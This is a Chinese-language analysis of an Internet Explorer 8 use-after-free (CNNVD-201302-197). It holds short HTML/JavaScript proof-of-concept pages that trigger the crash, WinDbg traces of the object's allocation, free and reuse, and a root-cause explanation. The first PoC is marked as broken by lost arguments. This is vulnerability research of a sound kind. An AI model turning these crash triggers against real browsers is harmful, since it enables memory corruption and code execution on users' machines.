Microsoft IE ‘SLayoutRun’释放后重用漏洞(CNNVD-201302-197)
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。
Microsoft Internet Explorer 8中的SLayoutRun中存在释放后重用漏洞。通过特制网站触发对已删除对象的访问,远程攻击者可利用该漏洞执行任意代码。
测试环境
Windows7
IE 8.0.7600.16385
poc代码如下
<!doctype html>
<html>
<head></head>
<body>
<!-- This <p> is the CParaElement that the later backtraces show being freed and then touched again (see the analysis below). -->
<p> </p>
<script>
// NOTE(review): the literal arguments on this line and on the setTimeout line appear to have been lost in
// extraction (the revised PoC further down shows Math.tan(2,3) and a 100 ms delay); as printed, both lines are syntax errors.
// Math.tan has no effect on the DOM; the later transcripts set a breakpoint on jscript!tan, so it presumably serves only as a debugger marker.
Math.tan(,);
// Style change on body applied before the timer fires; this page does not analyse what part it plays in the free/reuse.
document.body.style.whiteSpace = "pre-line";
// Deferred replacement of the body content; the free backtrace below reaches CBase::SubRelease via CElement::put_innerHTML.
setTimeout("document.body.innerHTML = 'i'",);
</script>
</body>
</html>
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
:> !heap -p -a esi
address 07620fd8 found in
_DPH_HEAP_ROOT @ 1a1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
75e06e8:
6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
ntdll!RtlDebugFreeHeap+0x0000002f
77857aca ntdll!RtlpFreeHeap+0x0000005d
77822d68 ntdll!RtlFreeHeap+0x00000142
771af1ac kernel32!HeapFree+0x00000014
6a2a930e mshtml!operator delete[]+0x00000016
6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
6a1f6f39 mshtml!CDoc::Remove+0x00000018
6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
6a1f7aef mshtml!InjectHtmlStream+0x00000191
6a1f793e mshtml!HandleHTMLInjection+0x0000005c
6a1f71fa mshtml!CElement::InjectInternal+0x00000307
6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046
6a1f988c mshtml!CElement::put_innerHTML+0x00000040
6a3372d6 mshtml!GS_BSTR+0x000001ac
6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc
6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d
6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
6a2d3104 mshtml!PlainInvokeEx+0x000000eb
6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
6c75a175 jscript!IDispatchExInvokeEx+0x0000006a
6c75a3f6 jscript!InvokeDispatchEx+0x00000098
6c75a4a0 jscript!VAR::InvokeByName+0x00000139
6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d
6c759c0e jscript!CScriptRuntime::Run+0x0000208d
6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6c765bfb jscript!ScrFncObj::Call+0x0000008d
6c765e11 jscript!CSession::Execute+0x0000015f
重利用:
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
分配:
1:021> g
Breakpoint 2 hit
eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70
eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CElement::CElement:
6830480f 8bff mov edi,edi
1:021> dd eax
077e6fd8 00000000 00000000 00000000 00000000
077e6fe8 00000000 00000000 00000000 00000000
077e6ff8 00000000 00000000 ???????? ????????
077e7008 ???????? ???????? ???????? ????????
077e7018 ???????? ???????? ???????? ????????
077e7028 ???????? ???????? ???????? ????????
077e7038 ???????? ???????? ???????? ????????
077e7048 ???????? ???????? ???????? ????????
1:021> kv
ChildEBP RetAddr Args to Child
0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement
0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12
0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26
0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43
0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3
0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82
0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237
0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221
0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15
0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb
0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7
0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10
0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19
0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c
0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23
0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])
0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])
0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])
释放:
(68327ec0) mshtml!CParaElement::`vftable' | (68328169) mshtml!CStyleSelector::SetSelectorPart
Exact matches:
mshtml!CParaElement::`vftable' = <no type information>
ChildEBP RetAddr Args to Child
0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])
0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c
0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca
0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18
0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a
0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191
0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c
0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307
0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46
0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40
0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac
0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc
0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d
0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d
0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb
0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104
0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
(96c.c6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????
尝试对应到js语句中
修改POC
<!doctype html>
<html>
<head></head>
<body>
<!-- This <p> is the CParaElement involved in the use-after-free (the allocation backtrace above ends in CParaElement::CreateElement). -->
<p> </p>
<script>
// Math.tan/sin/cos do not touch the DOM; the transcript below breaks on jscript!tan (bp 1), jscript!sin (bp 3)
// and jscript!cos (bp 2), so they act as ordering markers between the script statements and the free/reuse events.
Math.tan(2,3);
// Style change on body applied before the timer fires; this page does not analyse what part it plays in the free/reuse.
document.body.style.whiteSpace = "pre-line";
Math.sin(0);
// Deferred replacement of the body content; the free backtrace above reaches CBase::SubRelease via CElement::put_innerHTML.
setTimeout("document.body.innerHTML = 'i'",100);
Math.cos(0);
</script>
</body>
</html>
UAF元素CParaElement是由
<p> </p>
导致创建的
1:020> g
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!tan:
6be7d8c0 ff258010e56b jmp dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!sin:
6be7d711 ff256810e56b jmp dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!cos:
6be7d67f ff259010e56b jmp dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a
1:020> g
(6b0.f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
eip=68387386 esp=0423e844 ebp=0423e844 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????
释放可以根据回溯中的CElement::put_innerHTML分析得出是POC的document.body.innerHTML = 'i'所导致
没有明显的js语句对应于重用：从上面的跟踪看，三个Math断点全部命中之后才依次出现CBase::SubRelease与访问违例，因此重用发生在脚本主体执行完毕之后（推测在setTimeout回调引发的DOM更新过程中），而不对应于某条明确的js语句。
漏洞原因分析
这个漏洞的成因在于CTreeNode没有被释放，其中仍保留着指向已释放的CParaElement对象的悬垂指针；而CTreeNode没有被释放的原因在于它被CTreeDataPos对象错误地引用。